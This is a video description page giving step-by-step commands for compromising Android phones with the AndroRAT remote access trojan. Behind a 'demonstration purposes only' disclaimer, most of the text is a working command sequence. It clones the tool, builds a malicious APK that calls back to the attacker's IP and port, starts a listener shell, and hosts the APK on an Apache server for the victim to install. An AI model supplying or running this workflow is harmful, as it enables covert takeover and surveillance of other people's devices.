How to HACK any Android Phone or Device Step by Step | KALI AndroRAT | Ethical Hacking

1 year ago
67

THIS VIDEO AND INFORMATION IS FOR DEMONSTRATION PURPOSES ONLY. NEVER ATTEMPT THIS ON ANY DEVICE IF YOU DO NOT HAVE PERMISSION TO DO SO.

In this video, I will show you how easy it is to hack and pwn an android device. I demonstrate the process on a Samsung Galaxy Phone, but it will work on any android device, same process. I'll walk you through this process step by step and provide all of the commands you need. This video is for demonstration and educational purposes only, do not use this knowledge for malicous purposes.

Thanks for tuning in.
The IT-Unicorn

#####################
#Commands you need#
#####################
#download androRAT
git clone https://github.com/karma9874/AndroRAT.git

cd AndroRAT
ls

#check for dependencies
pip install -r requirements.txt

#show requirements
cat requirements.txt

#ifconfig to verify IP, make note of ip

#build the malicous apk RAT file
python androRAT.py --build -i IPADDRESSOFKALIHERE -p PICKAPORT -o filename.apk

#show the file in folder
ls -lt

#host listener
pthon androRAT.py --shell -i 0.0.0.0 -p PORTNUMBER

#open a new terminal
#check if apache is running
systemctl status apache2.service

#to start apache
systemctl start apache2.service

#copy apk to web application server directory
cd AndroRAT
cp filename.apk /var/www/html/

#open ipaddress/filename.apk on cell phone
#install on phone

#in listener shell, type help for a list of commands

Loading comments...